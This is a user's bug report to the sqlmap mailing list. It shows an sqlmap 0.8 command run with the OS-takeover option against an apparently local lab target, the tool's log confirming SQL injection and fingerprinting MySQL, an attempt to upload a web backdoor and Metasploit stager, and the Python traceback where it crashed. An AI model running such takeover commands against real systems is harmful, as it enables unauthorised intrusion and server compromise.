[sqlmap-users] sqlmap fatal error

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

[root]# ./sqlmap.py -u http://192.168.1.7/insecure.php --method=POST
--data="name=bobby&submit=Search" -p name --os-pwn

    sqlmap/0.8 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 02:10:57

[02:10:57] [WARNING] you did not provide the local path where Metasploit
Framework 3 is installed
[02:10:57] [WARNING] sqlmap is going to look for Metasploit Framework 3
installation into the environment paths
[02:10:57] [INFO] Metasploit Framework 3 has been found installed in the
'/usr/local/bin' path
[02:10:57] [INFO] using '/home/ethan/installs/sqlmap/output/
192.168.1.7/session' as session file
[02:10:57] [INFO] testing connection to the target url
[02:10:58] [INFO] testing if the url is stable, wait a few seconds
[02:10:59] [INFO] url is stable
[02:10:59] [INFO] testing sql injection on POST parameter 'name' with 0
parenthesis
[02:11:00] [INFO] testing unescaped numeric injection on POST parameter
'name'
[02:11:00] [INFO] POST parameter 'name' is not unescaped numeric injectable
[02:11:00] [INFO] testing single quoted string injection on POST parameter
'name'
[02:11:00] [INFO] confirming single quoted string injection on POST
parameter 'name'
[02:11:00] [INFO] POST parameter 'name' is single quoted string injectable
with 0 parenthesis
[02:11:00] [INFO] testing for parenthesis on injectable parameter
[02:11:01] [INFO] the injectable parameter requires 0 parenthesis
[02:11:01] [INFO] testing MySQL
[02:11:01] [INFO] confirming MySQL
[02:11:02] [INFO] retrieved: 4
[02:11:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0

[02:11:03] [INFO] testing stacked queries support on parameter 'name'
[02:11:03] [INFO] detecting back-end DBMS version from its banner
[02:11:03] [INFO] retrieved: 5.1.41
[02:11:15] [WARNING] the web application does not support stacked queries on
parameter 'name'
[02:11:15] [INFO] going to use a web backdoor to execute the payload stager
[02:11:15] [INFO] fingerprinting the back-end DBMS operating system
[02:11:15] [INFO] retrieved: \
[02:11:18] [INFO] the back-end DBMS operating system is Windows
[02:11:18] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP (default)
[2] PHP
[3] JSP
> 2
[02:11:21] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[02:11:22] [INFO] retrieved web server full paths:
'C:\xampp\htdocs\insecure.php'
please provide any additional web server full path to try to upload the
agent [C:/xampp/htdocs/]:
[02:11:23] [ERROR] unhandled exception in sqlmap/0.8, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon as
possible:
sqlmap version: 0.8
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 77, in main
    start()
  File "/home/ethan/installs/sqlmap/lib/controller/controller.py", line 259,
in start
    action()
  File "/home/ethan/installs/sqlmap/lib/controller/action.py", line 144, in
action
    conf.dbmsHandler.osPwn()
  File "/home/ethan/installs/sqlmap/plugins/generic/takeover.py", line 169,
in osPwn
    self.initEnv(web=web)
  File "/home/ethan/installs/sqlmap/lib/takeover/abstraction.py", line 155,
in initEnv
    self.webInit()
  File "/home/ethan/installs/sqlmap/lib/takeover/web.py", line 189, in
webInit
    uplPage, _  = Request.getPage(url=self.webUploaderUrl, direct=True,
raise404=False)
  File "/home/ethan/installs/sqlmap/lib/request/connect.py", line 126, in
getPage
    conn           = urllib2.urlopen(req)
  File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
    return _opener.open(url, data)
  File "/usr/lib/python2.5/urllib2.py", line 381, in open
    response = self._open(req, data)
  File "/usr/lib/python2.5/urllib2.py", line 399, in _open
    '_open', req)
  File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
    h = http_class(host) # will parse host:port
  File "/usr/lib/python2.5/httplib.py", line 639, in __init__
    self._set_hostport(host, port)
  File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: ''

[*] shutting down at: 02:11:23